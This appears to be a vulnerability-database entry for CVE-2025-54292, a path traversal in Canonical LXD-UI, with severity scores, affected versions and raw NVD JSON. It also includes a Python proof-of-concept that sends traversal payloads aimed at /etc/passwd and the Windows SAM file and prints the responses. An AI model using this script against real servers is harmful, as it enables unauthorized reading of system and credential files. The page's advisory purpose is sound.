Security Vulnerability Report
中文
CVE-2025-54292 CVSS 4.6 MEDIUM

CVE-2025-54292

Published: 2025-10-02 10:15:40
Last Modified: 2025-12-10 19:29:49
Source: [email protected]

Description

Path traversal in Canonical LXD LXD-UI versions before 6.5 and 5.21.4 on all platforms allows remote authenticated attackers to access or modify unintended resources via crafted resource names embedded in URL paths.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:* - VULNERABLE
Canonical LXD-UI < 5.21.4
Canonical LXD-UI < 6.5
所有受影响平台的 LXD-UI 上述版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54292 - Canonical LXD-UI Path Traversal PoC # Affected: LXD-UI versions before 6.5 and 5.21.4 import requests from urllib.parse import quote TARGET_URL = "https://lxd-ui-target:8443" AUTH_TOKEN = "your_auth_token_here" # Low-privilege authenticated session token def exploit_path_traversal(base_url, token, traversal_path): """ Exploit path traversal in LXD-UI by injecting traversal sequences into resource names embedded in URL paths. """ headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Construct malicious URL with path traversal payload # Example: /api/v1/instances/..%2F..%2F..%2Fetc%2Fpasswd encoded_payload = quote(traversal_path, safe='') malicious_url = f"{base_url}/ui/instance/{encoded_payload}" print(f"[*] Sending path traversal request to: {malicious_url}") response = requests.get(malicious_url, headers=headers, verify=False) if response.status_code == 200: print(f"[+] Success! Retrieved content:") print(response.text) return response.text else: print(f"[-] Failed with status code: {response.status_code}") return None # Example payloads payloads = [ "../../../etc/passwd", "..%2F..%2F..%2Fetc%2Fpasswd", "....//....//....//etc/passwd", "..%252f..%252f..%252fetc%252fpasswd", # Double encoding "..\\..\\..\\windows\\system32\\config\\sam" # Windows style ] if __name__ == "__main__": for payload in payloads: print(f"\n[*] Trying payload: {payload}") result = exploit_path_traversal(TARGET_URL, AUTH_TOKEN, payload) if result: break

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54292", "sourceIdentifier": "[email protected]", "published": "2025-10-02T10:15:39.567", "lastModified": "2025-12-10T19:29:48.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Path traversal in Canonical LXD LXD-UI versions before 6.5 and 5.21.4 on all platforms allows remote authenticated attackers to access or modify unintended resources via crafted resource names embedded in URL paths."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.21.4", "matchCriteriaId": "384194F1-A594-4215-88F5-65388022F8C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:lxd:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.5", "matchCriteriaId": "14733993-3FD6-4F2E-8379-670FC1E562E4"}]}]}], "references": [{"url": "https://github.com/canonical/lxd/security/advisories/GHSA-7425-4qpj-v4w3", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/canonical/lxd/security/advisories/GHSA-7425-4qpj-v4w3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.